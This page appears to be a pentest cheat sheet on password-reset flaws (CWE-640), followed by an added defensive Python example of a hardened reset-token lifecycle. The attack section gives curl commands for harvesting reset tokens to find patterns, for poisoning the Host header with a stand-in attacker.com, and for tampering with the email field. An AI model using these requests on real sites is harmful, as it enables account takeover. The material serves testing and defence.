
# Password Reset Exploitation

- CWE: CWE-640
- Tools: burp, jwt_tool
- Difficulty: 🟡 intermediate

## Exploit Password Reset Flaws

### Predict Reset Tokens

```bash
# Request multiple password reset tokens and analyze patterns
for i in {1..5}; do
    curl -X POST "https://TARGET/forgot-password" \
        -d "email=test${i}@test.com"
    sleep 1
done

# Analyze reset URLs/tokens for:
# - Timestamp-based tokens
# - Sequential tokens
# - User ID embedded in token
# - Weak hash (e.g., MD5 of email + timestamp)
```

### Poison the Host Header

```bash
# Poison the Host header so the reset link points to an attacker-controlled domain
curl -X POST "https://TARGET/forgot-password" \
    -H "Host: attacker.com" \
    -d "email=victim@target.com"

# If the reset email uses the Host header to construct the reset URL,
# the victim clicks a link to attacker.com, leaking the reset token
```

### Check Token Leakage via Referer

Reset links carry the token in the URL. If the reset page loads external resources (images, scripts, analytics), the browser sends that URL, token included, to the third party in the `Referer` header unless a restrictive `Referrer-Policy` is set. Check the password reset page for third-party resource loads.

### Manipulate the Reset Flow

```bash
# Parameter tampering -- change the email during password reset submission
curl -X POST "https://TARGET/reset-password" \
    -d "token=valid_token&password=newpass&email=attacker@evil.com"

# Token reuse -- after a successful reset, try the same token again

# Race condition -- request reset, then login quickly before reset invalidates old password
```
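For the defender's side of each finding above (predictable tokens, Host-header poisoning, Referer leakage, email tampering, token reuse and the reset/login race), the following is an added example of a reset-token lifecycle that closes those holes. It is not code from the original page; `ResetService`, `ResetRecord`, `BASE_URL`, `reset_page_headers` and the sample user table are constructed for illustration, and the record store is an in-memory dict standing in for a database.

```python
# Added example (not from the original page): a password-reset token lifecycle
# hardened against the weaknesses listed above. All names are constructed.
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional

# The link base comes from configuration, never from the request's Host header.
BASE_URL = "https://app.example.com"  # constructed value


@dataclass
class ResetRecord:
    user_id: int
    token_hash: str      # only a hash of the token is stored server-side
    expires_at: float
    used: bool = False


class ResetService:
    TTL_SECONDS = 15 * 60  # short lifetime limits the window for a leaked link

    def __init__(self, users: Dict[str, int]):
        self._users = users          # email -> user_id (constructed sample data)
        self._records: Dict[str, ResetRecord] = {}  # token_hash -> record

    @staticmethod
    def _hash(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def request_reset(self, email: str, host_header: str,
                      now: Optional[float] = None) -> Optional[str]:
        """Return the reset URL that would be e-mailed, or None for unknown users.

        host_header is accepted only to show it is ignored: the URL is built
        from BASE_URL, so a poisoned Host header cannot redirect the link.
        """
        now = time.time() if now is None else now
        user_id = self._users.get(email)
        if user_id is None:
            return None  # caller should still respond identically to avoid enumeration
        # 256 bits from the OS CSPRNG: no timestamp, sequence or user id to predict.
        token = secrets.token_urlsafe(32)
        h = self._hash(token)
        self._records[h] = ResetRecord(user_id, h, now + self.TTL_SECONDS)
        return f"{BASE_URL}/reset-password?token={token}"

    def complete_reset(self, token: str, new_password: str,
                       now: Optional[float] = None) -> Optional[int]:
        """Consume the token and return the bound user_id, or None if invalid.

        The account is taken from the token record, so an 'email' form field
        is never consulted; the token is single-use and time-limited.
        """
        now = time.time() if now is None else now
        h = self._hash(token)
        rec = None
        for stored in self._records.values():
            # constant-time compare over the hash, not the raw token
            if hmac.compare_digest(stored.token_hash, h):
                rec = stored
                break
        if rec is None or rec.used or now > rec.expires_at:
            return None
        # Consume this token and every other outstanding token for the user.
        for other in self._records.values():
            if other.user_id == rec.user_id:
                other.used = True
        # In a real deployment: set new_password and revoke all existing sessions
        # in the same transaction, so the old credential and old sessions stop
        # working at the moment the reset completes (closes the race above).
        return rec.user_id


def reset_page_headers() -> Dict[str, str]:
    """Response headers for the page that receives the tokenised link."""
    return {
        # Stops the token-bearing URL from being sent to third-party resources.
        "Referrer-Policy": "no-referrer",
        "Cache-Control": "no-store",
    }


if __name__ == "__main__":
    svc = ResetService({"alice@example.com": 1})
    url = svc.request_reset("alice@example.com", host_header="attacker.com")
    print(url)  # always under BASE_URL, regardless of the Host header
```

Two design points worth noting: storing only the SHA-256 of the token means a database read does not yield usable reset links, and consuming every outstanding token for the user on a successful reset means an older, possibly leaked, link cannot be replayed after the legitimate reset.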